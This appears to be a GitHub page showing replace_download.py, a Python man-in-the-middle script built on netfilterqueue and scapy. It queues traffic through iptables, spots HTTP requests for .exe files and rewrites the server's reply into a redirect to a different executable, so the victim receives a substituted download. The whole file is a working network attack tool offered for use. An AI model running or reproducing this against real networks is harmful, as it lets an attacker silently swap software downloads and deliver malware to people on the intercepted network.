-
Notifications
You must be signed in to change notification settings - Fork 12
Expand file tree
/
Copy pathreplace_download.py
More file actions
48 lines (40 loc) · 1.62 KB
/
replace_download.py
File metadata and controls
48 lines (40 loc) · 1.62 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/env python
import netfilterqueue
import subprocess
import scapy.all as scapy
ack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def proccess_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
print("\n[+] HTTP Request")
if ".exe" in scapy_packet[scapy.Raw].load:
print("[+] Exe Request")
ack_list.append(scapy_packet[scapy.TCP].ack)
print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("[+] Replacing File")
modified_packet = set_load( scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/winrar-x64-59b3.exe\n\n")
packet.set_payload(str(modified_packet))
packet.accept()
# For local Testing
subprocess.call("iptables -I OUTPUT -j NFQUEUE --queue-num 0", shell=True)
subprocess.call("iptables -I INPUT -j NFQUEUE --queue-num 0", shell=True)
# For Forwarding remote network
# subprocess.call("iptables -I FORWARD -j NFQUEUE --queue-num 0", shell=True)
try:
while True:
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, proccess_packet)
queue.run()
except KeyboardInterrupt:
subprocess.call("iptables --flush", shell=True)
print("\nStopped.. IP Tables Flushed")